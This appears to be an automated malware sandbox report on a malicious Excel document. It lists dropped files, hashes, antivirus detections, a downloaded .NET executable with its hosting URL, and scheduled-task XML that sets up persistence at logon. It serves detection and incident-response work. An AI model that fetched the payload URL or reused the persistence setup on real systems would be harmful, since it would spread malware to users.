                                                                          SHA-256:91F92DAA8C73D6470E92F484CF8CFA68EB3D49AE01170E7A673273E6B854B6F8
                                                                          SHA-512:CD3F9FB083204E3662300F3DC73701BA49FCB6975EE7E31458F0364CF98384F65E4E1BAF9049746ACEE529AD9BF663F4100B112D9ACA7A8BDF8750282A4F5AF0
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: Metadefender, Detection: 19%
                                                                          • Antivirus: ReversingLabs, Detection: 30%
                                                                          Joe Sandbox View:
• Filename: dpR3o92MH1.exe, Detection: malicious
                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\5DVxvgK9jn5gaBl[1].exe
                                                                          Process:C:\Users\user\AppData\Roaming\sp.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:downloaded
                                                                          Size (bytes):899072
                                                                          Entropy (8bit):7.536155290652203
                                                                          Encrypted:false
                                                                          SSDEEP:24576:JPrXEn1XhKMgBAhXwNNXMZrHZaKJMZrQgrp1Lc:G7hXSerHZaKJMZrQgr
                                                                          MD5:CEC5782C931581F13CE3C5D5B6A948A2
                                                                          SHA1:0C0CE04D190FEC3265DF430F6D3DC58FBB979653
                                                                          SHA-256:91F92DAA8C73D6470E92F484CF8CFA68EB3D49AE01170E7A673273E6B854B6F8
                                                                          SHA-512:CD3F9FB083204E3662300F3DC73701BA49FCB6975EE7E31458F0364CF98384F65E4E1BAF9049746ACEE529AD9BF663F4100B112D9ACA7A8BDF8750282A4F5AF0
                                                                          Malicious:true
                                                                          Antivirus:
• Antivirus: Metadefender, Detection: 19%
                                                                          • Antivirus: ReversingLabs, Detection: 30%
                                                                          Joe Sandbox View:
• Filename: dpR3o92MH1.exe, Detection: malicious
                                                                          IE Cache URL:http://gtp.bg/opkl/fioli/zplk/apo/5DVxvgK9jn5gaBl.exe
                                                                          C:\Users\user\AppData\Local\Temp\1CDE0000
                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):218510
                                                                          Entropy (8bit):7.935014690411741
                                                                          Encrypted:false
                                                                          SSDEEP:6144:nr0IUBvQUkM6fWRFTcf35skaMNVMTV5GcQgXYr1X:nZ6vQVpfWvTG5kS6T3JXy
                                                                          MD5:75752E30ED1F77084DEBBE7086F0D747
                                                                          SHA1:052B0B10B628CE6C96AA5DDCF41E151878D34BD3
                                                                          SHA-256:17E4318041BB1C43FBECD46F93E67D79710C10241BF10B4FB16AEF6EAD905D77
                                                                          SHA-512:60E39B0E2C712966751617C2ED02438F49BC825912FB8072524D2338B851A10F2D4C502355AFCBB6D2010E4B7984315A5093ED228A89B211F476C310C965A0F0
                                                                          Malicious:false
                                                                          C:\Users\user\AppData\Local\Temp\Cab9A5D.tmp
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                                                          Category:dropped
                                                                          Size (bytes):58936
                                                                          Entropy (8bit):7.994797855729196
                                                                          Encrypted:true
                                                                          SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                                                          MD5:E4F1E21910443409E81E5B55DC8DE774
                                                                          SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                                                          SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                                                          SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                                                          Malicious:false
                                                                          C:\Users\user\AppData\Local\Temp\Tar9A5E.tmp
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):152533
                                                                          Entropy (8bit):6.31602258454967
                                                                          Encrypted:false
                                                                          SSDEEP:1536:SIPLlYy2pRSjgCyrYBb5HQop4Ydm6CWku2PtIz0jD1rfJs42t6WP:S4LIpRScCy+fdmcku2PagwQA
                                                                          MD5:D0682A3C344DFC62FB18D5A539F81F61
                                                                          SHA1:09D3E9B899785DA377DF2518C6175D70CCF9DA33
                                                                          SHA-256:4788F7F15DE8063BB3B2547AF1BD9CDBD0596359550E53EC98E532B2ADB5EC5A
                                                                          SHA-512:0E884D65C738879C7038C8FB592F53DD515E630AEACC9D9E5F9013606364F092ACF7D832E1A8DAC86A1F0B0E906B2302EE3A840A503654F2B39A65B2FEA04EC3
                                                                          Malicious:false
                                                                          C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe
                                                                          Process:C:\Users\user\AppData\Roaming\sp.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):899072
                                                                          Entropy (8bit):7.536155290652203
                                                                          Encrypted:false
                                                                          SSDEEP:24576:JPrXEn1XhKMgBAhXwNNXMZrHZaKJMZrQgrp1Lc:G7hXSerHZaKJMZrQgr
                                                                          MD5:CEC5782C931581F13CE3C5D5B6A948A2
                                                                          SHA1:0C0CE04D190FEC3265DF430F6D3DC58FBB979653
                                                                          SHA-256:91F92DAA8C73D6470E92F484CF8CFA68EB3D49AE01170E7A673273E6B854B6F8
                                                                          SHA-512:CD3F9FB083204E3662300F3DC73701BA49FCB6975EE7E31458F0364CF98384F65E4E1BAF9049746ACEE529AD9BF663F4100B112D9ACA7A8BDF8750282A4F5AF0
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: Metadefender, Detection: 19%
                                                                          • Antivirus: ReversingLabs, Detection: 30%
                                                                          Joe Sandbox View:
• Filename: dpR3o92MH1.exe, Detection: malicious
                                                                          C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe
                                                                          Process:C:\Users\user\AppData\Roaming\sp.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):899072
                                                                          Entropy (8bit):7.536155290652203
                                                                          Encrypted:false
                                                                          SSDEEP:24576:JPrXEn1XhKMgBAhXwNNXMZrHZaKJMZrQgrp1Lc:G7hXSerHZaKJMZrQgr
                                                                          MD5:CEC5782C931581F13CE3C5D5B6A948A2
                                                                          SHA1:0C0CE04D190FEC3265DF430F6D3DC58FBB979653
                                                                          SHA-256:91F92DAA8C73D6470E92F484CF8CFA68EB3D49AE01170E7A673273E6B854B6F8
                                                                          SHA-512:CD3F9FB083204E3662300F3DC73701BA49FCB6975EE7E31458F0364CF98384F65E4E1BAF9049746ACEE529AD9BF663F4100B112D9ACA7A8BDF8750282A4F5AF0
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: Metadefender, Detection: 19%
                                                                          • Antivirus: ReversingLabs, Detection: 30%
                                                                          Joe Sandbox View:
• Filename: dpR3o92MH1.exe, Detection: malicious
                                                                          C:\Users\user\AppData\Local\Temp\tmp4F59.tmp
                                                                          Process:C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe
                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):1618
                                                                          Entropy (8bit):5.147009800458037
                                                                          Encrypted:false
                                                                          SSDEEP:24:2dH4+SEqCZ7ClNMFi/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBOtn:cbhZ7ClNQi/rydbz9I3YODOLNdq3W
                                                                          MD5:0BFDA9894AAFFAF34BB10F004BF8F1C2
                                                                          SHA1:9E4F5B33AC9D103010D4022D6791EAA642ED4B7B
                                                                          SHA-256:80E40CFA1E7998CC9694B7E4E37EBDDD90050A5B0547155CC9D90A66CDEA7304
                                                                          SHA-512:3B59BAFB9ED6E0B148C34B5CDC83A069359A8E73C2C616A5033694AEC212C3437CB99320B40626F51A8A1A6024B1063271D82AD2BF3F64A24D8411C30937DCA1
                                                                          Malicious:false
                                                                          Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>user-PC\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>user-PC\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>user-PC\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true</StartWhenAvailable>
                                                                          C:\Users\user\AppData\Local\Temp\tmpC70.tmp
                                                                          Process:C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe
                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):1618
                                                                          Entropy (8bit):5.147009800458037
                                                                          Encrypted:false
                                                                          SSDEEP:24:2dH4+SEqCZ7ClNMFi/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBOtn:cbhZ7ClNQi/rydbz9I3YODOLNdq3W
                                                                          MD5:0BFDA9894AAFFAF34BB10F004BF8F1C2
                                                                          SHA1:9E4F5B33AC9D103010D4022D6791EAA642ED4B7B
                                                                          SHA-256:80E40CFA1E7998CC9694B7E4E37EBDDD90050A5B0547155CC9D90A66CDEA7304
                                                                          SHA-512:3B59BAFB9ED6E0B148C34B5CDC83A069359A8E73C2C616A5033694AEC212C3437CB99320B40626F51A8A1A6024B1063271D82AD2BF3F64A24D8411C30937DCA1
                                                                          Malicious:false
                                                                          Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>user-PC\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>user-PC\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>user-PC\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true</StartWhenAvailable>
                                                                          C:\Users\user\AppData\Local\Temp\tmpCF32.tmp
                                                                          Process:C:\Users\user\AppData\Roaming\sp.exe
                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):1624
                                                                          Entropy (8bit):5.159058809341545
                                                                          Encrypted:false
                                                                          SSDEEP:24:2dH4+SEqCZ7ClNMFi/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBRtn:cbhZ7ClNQi/rydbz9I3YODOLNdq35
                                                                          MD5:359BF301730B92B0B225003468B6AA6C
                                                                          SHA1:31FA3842FB9D68E89CFBBC23524B19A42BBA38CE
                                                                          SHA-256:0C340003316D5B8DFE00D3E7AFD7A8511A49E54D91D9077FB7235F6ABC67AF88
                                                                          SHA-512:5FD6BA9BB93B6A08704E4055DF757C34DE316B8BEC2F55E1C60EA14D0579246EC5EA06B14673F20CF3E9966904E0AF644C749AB77E43B55143CF85E187380275
                                                                          Malicious:true
                                                                          Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>user-PC\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>user-PC\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>user-PC\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true</StartWhenAvailable>
                                                                          C:\Users\user\AppData\Roaming\JrekdQ.exe
                                                                          Process:C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):899072
                                                                          Entropy (8bit):7.536155290652203
                                                                          Encrypted:false
                                                                          SSDEEP:24576:JPrXEn1XhKMgBAhXwNNXMZrHZaKJMZrQgrp1Lc:G7hXSerHZaKJMZrQgr
                                                                          MD5:CEC5782C931581F13CE3C5D5B6A948A2
                                                                          SHA1:0C0CE04D190FEC3265DF430F6D3DC58FBB979653
                                                                          SHA-256:91F92DAA8C73D6470E92F484CF8CFA68EB3D49AE01170E7A673273E6B854B6F8
                                                                          SHA-512:CD3F9FB083204E3662300F3DC73701BA49FCB6975EE7E31458F0364CF98384F65E4E1BAF9049746ACEE529AD9BF663F4100B112D9ACA7A8BDF8750282A4F5AF0
                                                                          Malicious:true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: Metadefender, Detection: 19%
Joe Sandbox View (same file previously seen as):
• Filename: dpR3o92MH1.exe, Detection: malicious
                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....d._..............0.............n.... ........@.. ....................... ............@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H...................=...0...P...........................................p.WD^S\`.].4._.x..v..?)0o..8.U_`.........I..P..+.}.....K.gC.....L...Fb..._<y....KF..a!f..O[_.?`.gvl.0....F......(....3_.h.4.7W_."......7.d.nD.B.;..}.i./.C...O.:.\.S..7}...g@..FJ..`6!..P.~.,.).gF..Ow.....r..7yE.Q.......Q.A#..!(..M...P....'b\.\...S...h\..$.qP..oV.b:.'.!.Sn..q.>,g....x..M``...S.....R.O..Zwp@)...... R...../Ea=.`t.}h.....}bZ...P.&5S.........fd.|...,.........XM..
                                                                          C:\Users\user\AppData\Roaming\Logs\01-06-2021
                                                                          Process:C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):224
                                                                          Entropy (8bit):6.912521314864662
                                                                          Encrypted:false
                                                                          SSDEEP:6:tFt9VMm8kyapBMljjgo+wHT/cYXptXtSdIxn:B9CqnvUZb/cYX/3n
                                                                          MD5:93E9AE9299CD22033CF2739E5E235F72
                                                                          SHA1:269BFFC766A87B04F90D4B309B9BC391DC20C5AE
                                                                          SHA-256:6D69C80EC49D6964642C29CB54E3F134B9B723DB83DD0547A1B09153085A9749
                                                                          SHA-512:F41A300097B43DD1F44CECBE138A83DF814BE9B63B1AAB2CA8A9D0849D531048FF6E4C95D34A6F701D9012A8D8D50BFB20FC4F125FC0BCE8AB1E0ADFB49A1587
                                                                          Malicious:false
                                                                          Preview: =T.j...^.k....!.....=....C...n.]..4W.o8@_\.C?g...a.?.......e.-p|E...."p..m.N...HKn........,T.....G..$./..H.!..=..L. .G....!.W.W.......j..:.......no....s...{...m,..V..=P......f.2V.!p..".mF6D8.`..4.*.z...C..^n.SY...T
                                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Wed Jan 6 16:57:41 2021, atime=Wed Jan 6 16:57:41 2021, length=8192, window=hide
                                                                          Category:dropped
                                                                          Size (bytes):867
                                                                          Entropy (8bit):4.479459267402207
                                                                          Encrypted:false
                                                                          SSDEEP:12:85Qk/CLgXg/XAlCPCHaXgzB8IB/4lX+WnicvbxbDtZ3YilMMEpxRljK2yTdJP9TK:85bU/XTwz6IIYexDv3qorNru/
                                                                          MD5:3E70A9BE98F423C2E1CFCAAE131A92D1
                                                                          SHA1:E027EA857C717A5195B65CDB20899F959AB51436
                                                                          SHA-256:E49B0933B533D97CBA5FCC544F1E05287AAE845C043D37F192B24FF43912AD27
                                                                          SHA-512:840C4D95A61C921C003ACFAA4B12C12BB2FB2D6B612AF668D278FF1995BE75B53ECAEAE6B0EA6B8D421426675DABAF419B056F7780298683DEC75BFD37BE592C
                                                                          Malicious:false
                                                                          Preview: L..................F...........7G.."..mU..."..mU.... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....&R5...Desktop.d......QK.X&R5.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\134349\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......134349..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):98
                                                                          Entropy (8bit):4.29593984928515
                                                                          Encrypted:false
                                                                          SSDEEP:3:oyBVomMF3zd8CO8zd8CmMF3zd8Cv:dj6F3Z8sZ8UF3Z8s
                                                                          MD5:121AA7B0E15C0A2FAF081C912D00A1CF
                                                                          SHA1:DA137B4B637D550C95187F23D8860A85B5A7CB86
                                                                          SHA-256:7187575715B0E3C58A5A71F3A35094E3715F2A84B60565020E5B1C6AA2DD6832
                                                                          SHA-512:8AE109F6E0B7C2BB853DEE3016B72628F43950664FA6991E22C29BE24BE25B5A0777420490EED644BC6F9847323C4CFD24FF80578BB59FD8C836672FC13F063F
                                                                          Malicious:false
                                                                          Preview: Desktop.LNK=0..[xls]..spetsifikatsiya.LNK=0..spetsifikatsiya.LNK=0..[xls]..spetsifikatsiya.LNK=0..
                                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\spetsifikatsiya.LNK
                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:13 2020, mtime=Wed Jan 6 16:57:41 2021, atime=Wed Jan 6 16:57:41 2021, length=242176, window=hide
                                                                          Category:dropped
                                                                          Size (bytes):2078
                                                                          Entropy (8bit):4.523995257095842
                                                                          Encrypted:false
                                                                          SSDEEP:48:8yn/XT3IkE5JE2oQh2yn/XT3IkE5JE2oQ/:8K/XLIkE5G2oQh2K/XLIkE5G2oQ/
                                                                          MD5:4E69BD98AE858B2F9D9FF10AF55E8930
                                                                          SHA1:FB358FB1E86F5FF5A17FCE58A10978702A97AEB4
                                                                          SHA-256:CA80EBFAA83DBC709F9FA77C64594508DAE4ED32D91B82BE6852E698C749EDCD
                                                                          SHA-512:6FB5374D8AF55B56B35F413A40B7EF202B3A0567CD91FD7BD5C0D5F028B6114883B434CCF0A5AC26B19A3658A43800EE80BEEBE043BA0C9EF873B16FA3D6CB1C
                                                                          Malicious:false
                                                                          Preview: L..................F.... ...6.2..{.."..mU...C..mU................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....p.2.....&R3. .SPETSI~1.XLS..T.......Q.y.Q.y*...8.....................s.p.e.t.s.i.f.i.k.a.t.s.i.y.a...x.l.s.......}...............-...8...[............?J......C:\Users\..#...................\\134349\Users.user\Desktop\spetsifikatsiya.xls.*.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.s.p.e.t.s.i.f.i.k.a.t.s.i.y.a...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......134349..........D_....3N...W...9F.C.........
                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\71YY0ZNRPQ4IRKSGGQ82.temp
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):8016
                                                                          Entropy (8bit):3.5854792121295844
                                                                          Encrypted:false
                                                                          SSDEEP:96:chQCsMqUqvsqvJCwoaz8hQCsMqUqvsEHyqvJCworIzkKYxHxf8R/lUVMIu:cydoaz8yFHnorIzk5f8RfIu
                                                                          MD5:E1A490558DC2A2E45566613FE711A4C6
                                                                          SHA1:C05F17A5F88A049EB161809B00FDF2EA080C80B5
                                                                          SHA-256:0F5C20CA884F4DCE8230B5CC286016CE5C360058B3982EE02A251CFCDA1ADAAB
                                                                          SHA-512:8F2E08C34EAB3B978E2CD66B639C2FFB3550D2C05CAD0A151C60B512600CA449EF1A35D50246481F94025CEFE92E8EB197D85A4BBFD498761E95A07516A01977
                                                                          Malicious:false
                                                                          Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\C46FS22UMOIQN8SC5D58.temp
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):8016
                                                                          Entropy (8bit):3.5854792121295844
                                                                          Encrypted:false
                                                                          SSDEEP:96:chQCsMqUqvsqvJCwoaz8hQCsMqUqvsEHyqvJCworIzkKYxHxf8R/lUVMIu:cydoaz8yFHnorIzk5f8RfIu
                                                                          MD5:E1A490558DC2A2E45566613FE711A4C6
                                                                          SHA1:C05F17A5F88A049EB161809B00FDF2EA080C80B5
                                                                          SHA-256:0F5C20CA884F4DCE8230B5CC286016CE5C360058B3982EE02A251CFCDA1ADAAB
                                                                          SHA-512:8F2E08C34EAB3B978E2CD66B639C2FFB3550D2C05CAD0A151C60B512600CA449EF1A35D50246481F94025CEFE92E8EB197D85A4BBFD498761E95A07516A01977
                                                                          Malicious:false
                                                                          Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DFLQU3YDWIS0DDTFQO4S.temp
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):8016
                                                                          Entropy (8bit):3.5854792121295844
                                                                          Encrypted:false
                                                                          SSDEEP:96:chQCsMqUqvsqvJCwoaz8hQCsMqUqvsEHyqvJCworIzkKYxHxf8R/lUVMIu:cydoaz8yFHnorIzk5f8RfIu
                                                                          MD5:E1A490558DC2A2E45566613FE711A4C6
                                                                          SHA1:C05F17A5F88A049EB161809B00FDF2EA080C80B5
                                                                          SHA-256:0F5C20CA884F4DCE8230B5CC286016CE5C360058B3982EE02A251CFCDA1ADAAB
                                                                          SHA-512:8F2E08C34EAB3B978E2CD66B639C2FFB3550D2C05CAD0A151C60B512600CA449EF1A35D50246481F94025CEFE92E8EB197D85A4BBFD498761E95A07516A01977
                                                                          Malicious:false
                                                                          Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\OY5PTG0JO5WWBCHCBZ8W.temp
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):8016
                                                                          Entropy (8bit):3.5854792121295844
                                                                          Encrypted:false
                                                                          SSDEEP:96:chQCsMqUqvsqvJCwoaz8hQCsMqUqvsEHyqvJCworIzkKYxHxf8R/lUVMIu:cydoaz8yFHnorIzk5f8RfIu
                                                                          MD5:E1A490558DC2A2E45566613FE711A4C6
                                                                          SHA1:C05F17A5F88A049EB161809B00FDF2EA080C80B5
                                                                          SHA-256:0F5C20CA884F4DCE8230B5CC286016CE5C360058B3982EE02A251CFCDA1ADAAB
                                                                          SHA-512:8F2E08C34EAB3B978E2CD66B639C2FFB3550D2C05CAD0A151C60B512600CA449EF1A35D50246481F94025CEFE92E8EB197D85A4BBFD498761E95A07516A01977
                                                                          Malicious:false
